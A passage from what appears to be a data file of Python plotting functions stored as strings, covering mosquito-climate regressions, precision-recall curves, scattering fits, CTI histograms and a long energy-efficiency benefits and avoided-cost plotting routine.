parameters['rainfall'] * data['rainfall'])\n\n ax0.plot(predicted, data['mosquitos'], 'gd')\n\n ax0.set_xlabel('predicted mosquito population')\n ax0.set_ylabel('measured mosquito population')\n \n # plot mosquitos vs. temperature\n ax1 = fig.add_subplot(3, 1, 2)\n\n ax1.plot(data['temperature'], data['mosquitos'], 'ro')\n ax1.set_xlabel('temperature')\n ax1.set_ylabel('mosquitos')\n\n # plot mosquitos vs. rainfall\n ax2 = fig.add_subplot(3, 1, 3)\n\n ax2.plot(data['rainfall'], data['mosquitos'], 'bs')\n ax2.set_xlabel('rainfall')\n ax2.set_ylabel('mosquitos')\n \n # adjust layout of axes according to label placement\n plt.tight_layout()\n \n return fig", "def avg_response(df, x, y_obs, y_est, save=False, show=True):\n\n fig, ax1 = plt.subplots(figsize=(15,15))\n\n ax2 = ax1.twinx()\n\n x_name = x\n if df[x].dtype == \"int\":\n x = df[x].astype(\"category\")\n elif df[x].dtype == \"float\":\n x = pd.cut(df[x], bins=10)\n\n metrics = {\"mean\":\"mean\", \"std err\":\"sem\", \"count\":\"count\"}\n df_grouped = df.groupby([x])[y_obs, y_est].agg(metrics)\n \n x_vals = range(len(df_grouped))\n y_vals = df_grouped[\"mean\"][y_est]\n ax1.errorbar(x_vals, y_vals,yerr=df_grouped[\"std err\"][y_est], fmt='-',\n marker='o',color=\"R\", mec='black', ms=10, mew=2, linewidth=4, \n capsize=10, elinewidth=2)\n\n y_vals = df_grouped[\"mean\"][y_obs]\n ax1.plot(x_vals, y_vals, '-', label=y_obs, marker='o',\n color = \"G\",mec='black', ms=10, mew=2, linewidth=4)\n\n y_vals = df_grouped[\"count\"][y_obs]\n ax2.bar(x_vals,y_vals, color='DarkSlateGray', alpha = 0.25)\n\n ax1.set_xlim(x_vals[0]-0.2,x_vals[-1]+1)\n x_levels = list(y_vals.index)\n plt.xticks(x_vals, x_levels)\n ax1.set_xticklabels(x_levels, rotation=45)\n ax1.grid(False)\n ax2.grid(False)\n font_size = 20\n ax1.set_xlabel(x_name, fontsize=font_size)\n ax1.set_ylabel(y_obs, fontsize=font_size)\n ax2.set_ylabel(\"count\", fontsize=font_size)\n plt.title(\"Average {y} for groups of {x}\".format(x=x_name, y=y_obs), \n fontsize=font_size+5)\n ax1.legend([y_obs, y_est], fontsize=font_size-2)\n if save:\n fig.savefig(\"/home/edward/work/repos/prometheus/python/plots/avg_response/{}.png\".\n format(x_name), bbox_inches='tight')\n if show:\n plt.show()", "def plot_data(X, y, X_pred, clf, title):\n \n figsize(10.2, 5.1)\n X2 = [[x] for x in linspace(0, max(X_pred)[0] * 1.15, 50)]\n days = clf.predict(X_pred)\n scatter(X, y, color='black')\n scatter(X_pred, days, color='red')\n plot(X2, clf.predict(X2), color='blue')\n \n i = 0\n len_data = len(X_pred)\n xytext = (5, -10)\n for data in zip(X_pred, days):\n i = i + 1\n dat = purchase_date + timedelta(int(round(data[1], 0)))\n\n annotate(dat.strftime('%b %d %Y'), xy=(data[0][0], data[1]), xycoords='data', xytext=xytext, textcoords='offset points')\n \n pylab.ylim([0, int(clf.predict(X2).max()) + 1])\n pylab.xlim([0, max(X2)[0]])\n ax=pylab.gca()\n ax.yaxis.set_major_formatter(NullFormatter())\n ax.yaxis.set_minor_formatter(NullFormatter())\n pylab.axes().set_xlabel('Miles')\n pylab.axes().set_ylabel('Time')\n pylab.axes().set_title(title)", "def plotPRC(yscore, true, datasets, title, outfile):\n \n fig = plt.figure()\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title(title)\n \n for i in range(len(datasets)):\n precision, recall, _ = precision_recall_curve(true[i], yscore[i][:,1])\n prc_auc = average_precision_score(true[i], yscore[i][:,1])\n plt.plot(recall, precision, label=datasets[i]+' (area = %0.2f)' % (prc_auc),linewidth=1)\n \n plt.legend(loc=\"lower right\")\n \n pdfplot = PdfPages(outfile);\n pdfplot.savefig(fig)\n pdfplot.close()", "def plotFittingResults(self):\n _listFitQ = [tmp.getValue() for tmp in self.getDataOutput().getScatteringFitQ()]\n _listFitValues = [tmp.getValue() for tmp in self.getDataOutput().getScatteringFitValues()]\n _listExpQ = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataQ()]\n _listExpValues = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataValues()]\n\n #_listExpStdDev = None\n #if self.getDataInput().getExperimentalDataStdDev():\n # _listExpStdDev = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataStdDev()]\n #if _listExpStdDev:\n # pylab.errorbar(_listExpQ, _listExpValues, yerr=_listExpStdDev, linestyle='None', marker='o', markersize=1, label=\"Experimental Data\")\n # pylab.gca().set_yscale(\"log\", nonposy='clip')\n #else: \n # pylab.semilogy(_listExpQ, _listExpValues, linestyle='None', marker='o', markersize=5, label=\"Experimental Data\")\n\n pylab.semilogy(_listExpQ, _listExpValues, linestyle='None', marker='o', markersize=5, label=\"Experimental Data\")\n pylab.semilogy(_listFitQ, _listFitValues, label=\"Fitting curve\")\n pylab.xlabel('q')\n pylab.ylabel('I(q)')\n pylab.suptitle(\"RMax : %3.2f. Fit quality : %1.3f\" % (self.getDataInput().getRMax().getValue(), self.getDataOutput().getFitQuality().getValue()))\n pylab.legend()\n pylab.savefig(os.path.join(self.getWorkingDirectory(), \"gnomFittingResults.png\"))\n pylab.clf()", "def plotResults(results):\n e = results['eclean'] - results['eCTI']\n e1 = results['e1clean'] - results['e1CTI']\n e2 = results['e2clean'] - results['e2CTI']\n\n print 'Delta e, e_1, e_2:', np.mean(e), np.mean(e1), np.mean(e2)\n print 'std e, e_1, e_2:', np.std(e), np.std(e1), np.std(e2)\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(e, bins=15, label='$e$', alpha=0.5)\n ax.hist(e1, bins=15, label='$e_{2}$', alpha=0.5)\n ax.hist(e2, bins=15, label='$e_{1}$', alpha=0.5)\n ax.set_xlabel(r'$\\delta e$ [no CTI - CDM03 corrected]')\n plt.legend(shadow=True, fancybox=True)\n plt.savefig('ellipticityDelta.pdf')\n plt.close()\n\n r2 = (results['R2clean'] - results['R2CTI'])/results['R2clean']\n print 'delta R2 / R2: mean, std ', np.mean(r2), np.std(r2)\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(r2, bins=15, label='$R^{2}$')\n ax.set_xlabel(r'$\\frac{\\delta R^{2}}{R^{2}_{ref}}$ [no CTI - CDM03 corrected]')\n plt.legend(shadow=True, fancybox=True)\n plt.savefig('sizeDelta.pdf')\n plt.close()", "def plot_results(outputs_table_totals, elec_benefits, gas_benefits):\n summer_months = [6, 7, 8, 9]\n shoulder_months = [3, 4, 5, 10]\n winter_months = [11, 12, 1, 2]\n peak_hours = [16, 17, 18, 19, 20]\n pct_hours_in_summer = 2928 / 8760\n pct_hours_in_shoulder = 2952 / 8760\n pct_hours_in_winter = 2880 / 8760\n\n trc_costs_record = outputs_table_totals[\"TRC Costs ($)\"]\n pac_costs_record = outputs_table_totals[\"PAC Costs ($)\"]\n trc_record = outputs_table_totals[\"TRC\"]\n pac_record = outputs_table_totals[\"PAC\"]\n lifecycle_net_mwh = outputs_table_totals[\"Electricity Lifecycle Net Savings (MWh)\"]\n lifecycle_net_therms = outputs_table_totals[\"Gas Lifecycle Net Savings (Therms)\"]\n lifecycle_net_ghg = outputs_table_totals[\"Total Lifecycle GHG Savings (Tons)\"]\n\n # Getting variables for plots\n elec_benefits_cols = (\n [\"hourly_savings\"] + ACC_COMPONENTS_ELECTRICITY + [\"av_csts_levelized\"]\n )\n\n elec_benefits_hour_month_year = (\n elec_benefits.groupby([\"hour_of_day\", \"year\", \"month\"])\n .agg(\n {\n **{component: \"sum\" for component in ACC_COMPONENTS_ELECTRICITY},\n **{\n \"hourly_savings\": \"sum\",\n \"marginal_ghg\": \"sum\",\n \"av_csts_levelized\": \"mean\",\n },\n }\n )\n .reset_index()\n )\n\n total_benefits = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\"total\"].sum()\n )\n\n summer_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n summer_peak_benefits = elec_benefits_hour_month_year[\"total\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].sum()\n shoulder_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(shoulder_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n winter_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n total_savings = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\"hourly_savings\"].sum()\n )\n summer_savings = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n shoulder_savings = list(\n elec_benefits_hour_month_year[\n ((elec_benefits_hour_month_year[\"month\"].isin(shoulder_months)))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n summer_peak_savings = elec_benefits_hour_month_year[\"hourly_savings\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].sum()\n winter_savings = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n total_av_csts_avg = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\n \"av_csts_levelized\"\n ].mean()\n )\n summer_av_csts_avg = list(\n pct_hours_in_summer\n * elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n summer_peak_av_csts_avg = elec_benefits_hour_month_year[\"av_csts_levelized\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].mean()\n shoulder_av_csts_avg = list(\n pct_hours_in_shoulder\n * elec_benefits_hour_month_year[\n ((elec_benefits_hour_month_year[\"month\"].isin(shoulder_months)))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n winter_av_csts_avg = list(\n pct_hours_in_winter\n * elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n\n elec_benefits_sum_by_hod = (\n elec_benefits[elec_benefits_cols].groupby(elec_benefits[\"hour_of_day\"]).sum()\n )\n elec_benefits_hoy = (\n elec_benefits[elec_benefits_cols]\n .groupby(elec_benefits[\"hour_of_year\"])\n .sum()\n .cumsum()\n .reset_index()\n )\n sav_avcsts_288 = (\n elec_benefits.groupby([\"hour_of_day\", \"month\"])\n .agg(\n {\n **{component: \"sum\" for component in ACC_COMPONENTS_ELECTRICITY},\n **{\n \"hourly_savings\": \"sum\",\n \"marginal_ghg\": \"sum\",\n \"av_csts_levelized\": \"mean\",\n },\n }\n )\n .reset_index()\n )\n sav_avcsts_288 = sav_avcsts_288[\n [\"hour_of_day\", \"month\", \"hourly_savings\", \"total\", \"marginal_ghg\"]\n ]\n ghgsav = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", \"marginal_ghg\")\n sav = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", \"hourly_savings\")\n avcsts = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", \"total\")\n\n # savings load shape plot\n fig0, (ax1, ax2, ax3) = plt.subplots(\n 1, 3, figsize=(18, 5), sharex=True, sharey=True\n )\n plt.subplots_adjust(wspace=0, hspace=0)\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels1 = [\"Summer\"]\n legend_labels2 = [\"Shoulder\"]\n legend_labels3 = [\"Winter\"]\n\n ax1.plot(\n hod,\n summer_savings,\n c=\"firebrick\",\n linewidth=5,\n marker=\"$\\u25EF$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax2.plot(\n hod,\n shoulder_savings,\n c=\"royalblue\",\n linewidth=5,\n marker=\"$\\u2206$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax3.plot(\n hod,\n winter_savings,\n c=\"green\",\n linewidth=5,\n marker=\"$\\u25A1$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax1.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax2.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax3.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n leg1 = ax1.legend(legend_labels1, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels2, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels3, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax1.set_ylabel(\"Savings (MWh/hr)\", size=16)\n ax2.set_xlabel(\"Hour of Day\", size=16)\n\n if max(summer_savings + shoulder_savings + winter_savings) < 0:\n ymax = 0\n else:\n ymax = max(summer_savings + shoulder_savings + winter_savings)\n if min(summer_savings + shoulder_savings + winter_savings) > 0:\n ymin = 0\n else:\n ymin = min(summer_savings + shoulder_savings + winter_savings)\n\n # Tick and lebel parameters\n ax1.set_ylim(ymin * 1.08, ymax * 1.08)\n ax1.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax1.set_xticks(np.arange(0, 24, step=4))\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax1.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax2.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax2.xaxis.set_minor_locator(AutoMinorLocator())\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n # Set plot title, size, and position\n ax1.set_title(\"Seasonal Savings Load Shapes\", size=18, loc=\"left\").set_position(\n [0, 1.03]\n )\n\n # benefits_seasonal_shape_plot\n fig1, (ax1, ax2, ax3) = plt.subplots(\n 1, 3, figsize=(18, 5), sharex=True, sharey=True\n )\n plt.subplots_adjust(wspace=0, hspace=0)\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels1 = [\"Summer\"]\n legend_labels2 = [\"Shoulder\"]\n legend_labels3 = [\"Winter\"]\n\n ax1.plot(\n hod,\n summer_benefits,\n c=\"firebrick\",\n linewidth=5,\n marker=\"$\\u2B24$\",\n markersize=13,\n linestyle=\":\",\n )\n ax2.plot(\n hod,\n shoulder_benefits,\n c=\"royalblue\",\n linewidth=5,\n marker=\"$\\u25B2$\",\n markersize=13,\n linestyle=\":\",\n )\n ax3.plot(\n hod,\n winter_benefits,\n c=\"green\",\n linewidth=5,\n marker=\"$\\u25A0$\",\n markersize=13,\n linestyle=\":\",\n )\n ax1.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax2.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax3.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n leg1 = ax1.legend(legend_labels1, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels2, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels3, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax1.set_ylabel(\"TRC Benefits ($/hr)\", size=16)\n ax2.set_xlabel(\"Hour of Day\", size=16)\n\n if max(summer_benefits + shoulder_benefits + winter_benefits) < 0:\n ymax = 0\n else:\n ymax = max(summer_benefits + shoulder_benefits + winter_benefits)\n if min(summer_benefits + shoulder_benefits + winter_benefits) > 0:\n ymin = 0\n else:\n ymin = min(summer_benefits + shoulder_benefits + winter_benefits)\n\n # Tick and label parameters\n ax1.set_ylim(ymin * 1.08, ymax * 1.08)\n ax1.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax1.set_xticks(np.arange(0, 24, step=4))\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax1.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax2.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax2.xaxis.set_minor_locator(AutoMinorLocator())\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Seasonal TRC Benefits by Hour ($)\", size=18, loc=\"left\"\n ).set_position([0, 1.03])\n\n # sum_hourly_plot\n fig2 = plt.figure(figsize=(12, 7), dpi=250)\n ax = fig2.gca()\n colors = [\n \"royalblue\",\n \"black\",\n \"pink\",\n \"firebrick\",\n \"gray\",\n \"darkviolet\",\n \"darkorange\",\n \"green\",\n \"saddlebrown\",\n ]\n legend_labels = []\n x = 1\n while x <= len(ACC_COMPONENTS_ELECTRICITY[1:]):\n if x == 1:\n ax.bar(\n hod,\n elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]],\n color=colors[x - 1],\n )\n legend_labels.append(\n re.findall(\n \".*Name: (.*),\",\n str(elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]]),\n )[0]\n )\n x += 1\n else:\n ax.bar(\n hod,\n elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]],\n bottom=elec_benefits_sum_by_hod.iloc[:, 2 : x + 1].sum(axis=1),\n color=colors[x - 1],\n )\n legend_labels.append(\n re.findall(\n \".*Name: (.*),\",\n str(elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]]),\n )[0]\n )\n x += 1\n\n # Set x and y limits based on min and max values\n ymax = elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).max()\n if elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).min() > 0:\n ymin = 0\n else:\n ymin = elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).min()\n\n ax.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax.set_ylim(ymin * 1.1, ymax * 1.08)\n\n # Set x and y axis labels\n ax.set_xlabel(\"Hour of Day\", size=17, labelpad=5)\n ax.set_ylabel(\"$ Avoided Costs\", size=17)\n\n # Set plot title, size, and position\n ax.set_title(\n \"Sum of Electric Avoided Costs by Component and Hour of Day\",\n size=17,\n loc=\"left\",\n )\n\n # Tick and lebel parameters\n ax.tick_params(bottom=True, top=False, left=True, right=False)\n ax.set_xticks(np.arange(0, 24, step=4))\n ax.set_yticks(\n np.arange(\n int(round(ymin * 1.1, 0)),\n ymax * 1.08,\n step=max(round(ymax - ymin, 2) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n plt.legend(\n legend_labels,\n bbox_to_anchor=(1, 1),\n fontsize=12,\n loc=\"upper left\",\n frameon=False,\n )\n\n # avoided_cost_summary_plot\n fig3, (ax1, ax2, ax3) = plt.subplots(\n 3, 1, figsize=(6, 10), sharex=True, sharey=False\n )\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels = [\"Total\", \"Summer\", \"Shoulder\", \"Winter\"]\n\n ax1.plot(\n hod,\n total_benefits,\n c=\"royalblue\",\n marker=\"$\\u25EF$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax1.plot(hod, summer_benefits, c=\"darkorchid\", linewidth=1, linestyle=\"--\")\n ax1.plot(hod, shoulder_benefits, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax1.plot(hod, winter_benefits, c=\"teal\", linewidth=1, linestyle=\"-\")\n ax2.plot(\n hod,\n total_savings,\n c=\"firebrick\",\n marker=\"$\\u2206$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax2.plot(hod, summer_savings, c=\"darkorchid\", linewidth=1, linestyle=\"--\")\n ax2.plot(hod, shoulder_savings, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax2.plot(hod, winter_savings, c=\"teal\", linewidth=1, linestyle=\"-\")\n ax3.plot(\n hod,\n total_av_csts_avg,\n c=\"green\",\n marker=\"$\\u25A0$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax3.plot(hod, summer_av_csts_avg, c=\"darkorchid\", linewidth=1, linestyle=\"--\")\n ax3.plot(hod, shoulder_av_csts_avg, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax3.plot(hod, winter_av_csts_avg, c=\"teal\", linewidth=1, linestyle=\"-\")\n\n leg1 = ax1.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax3.set_xticks(np.arange(0, 24, step=4))\n ax3.set_xlabel(\"Hour of Day\", size=14, labelpad=5)\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=12\n )\n ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n ax1.set_ylabel(\"TRC Benefits ($)\", size=14)\n ax2.set_ylabel(\"Savings (MWh)\", size=14)\n ax3.set_ylabel(\"Av. Cost ($/MWh)\", size=14)\n\n if max(total_benefits + summer_benefits + shoulder_benefits + winter_benefits) < 0:\n ymax1 = 0\n else:\n ymax1 = max(\n total_benefits + summer_benefits + shoulder_benefits + winter_benefits\n )\n if min(total_benefits + summer_benefits + shoulder_benefits + winter_benefits) > 0:\n ymin1 = 0\n else:\n ymin1 = min(\n total_benefits + summer_benefits + shoulder_benefits + winter_benefits\n )\n if max(total_savings + summer_savings + shoulder_savings + winter_savings) < 0:\n ymax2 = 0\n else:\n ymax2 = max(total_savings + summer_savings + shoulder_savings + winter_savings)\n if min(total_savings + summer_savings + shoulder_savings + winter_savings) > 0:\n ymin2 = 0\n else:\n ymin2 = min(total_savings + summer_savings + shoulder_savings + winter_savings)\n if (\n max(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n < 0\n ):\n ymax3 = 0\n else:\n ymax3 = max(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n if (\n min(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n > 0\n ):\n ymin3 = 0\n else:\n ymin3 = min(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n\n # Tick and lebel parameters\n ax1.set_ylim(ymin1 * 1.08, ymax1 * 1.08)\n ax2.set_ylim(ymin2 * 1.08, ymax2 * 1.08)\n ax3.set_ylim(ymin3 * 1.08, ymax3 * 1.08)\n\n ax1.set_yticks(\n np.arange(\n ymin1 * 1.08,\n ymax1 * 1.08,\n step=max(round(ymax1 - ymin1, 3) / 5, int((round(ymax1 - ymin1, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin2 * 1.08,\n ymax2 * 1.08,\n step=max(round(ymax2 - ymin2, 3) / 5, int((round(ymax2 - ymin2, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin3 * 1.08,\n ymax3 * 1.08,\n step=max(round(ymax3 - ymin3, 3) / 5, int((round(ymax3 - ymin3, 0)) / 4)),\n )\n )\n\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n ax2.axvspan(16, 21, alpha=0.2, color=\"grey\")\n ax3.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n # Print key information\n plt.annotate(\n \"Electric Benefits = $\" + str(round(elec_benefits[\"total\"].sum(), 2)),\n xy=(350, 530),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Gas Benefits = $\" + str(round(gas_benefits, 2)),\n xy=(350, 505),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Total Benefits = $\"\n + str(round(elec_benefits[\"total\"].sum() + gas_benefits, 2)),\n xy=(350, 480),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"TRC Costs = $\" + str(trc_costs_record),\n xy=(350, 455),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"PAC Costs = $\" + str(pac_costs_record),\n xy=(350, 430),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"TRC = \" + str(trc_record),\n xy=(350, 405),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"PAC = \" + str(pac_record),\n xy=(350, 380),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle Electric Savings = \" + str(lifecycle_net_mwh) + \" MWh\",\n xy=(350, 335),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle Gas Savings = \" + str(lifecycle_net_therms) + \" Therms\",\n xy=(350, 310),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle GHG Savings = \" + str(lifecycle_net_ghg) + \" Tons\",\n xy=(350, 285),\n 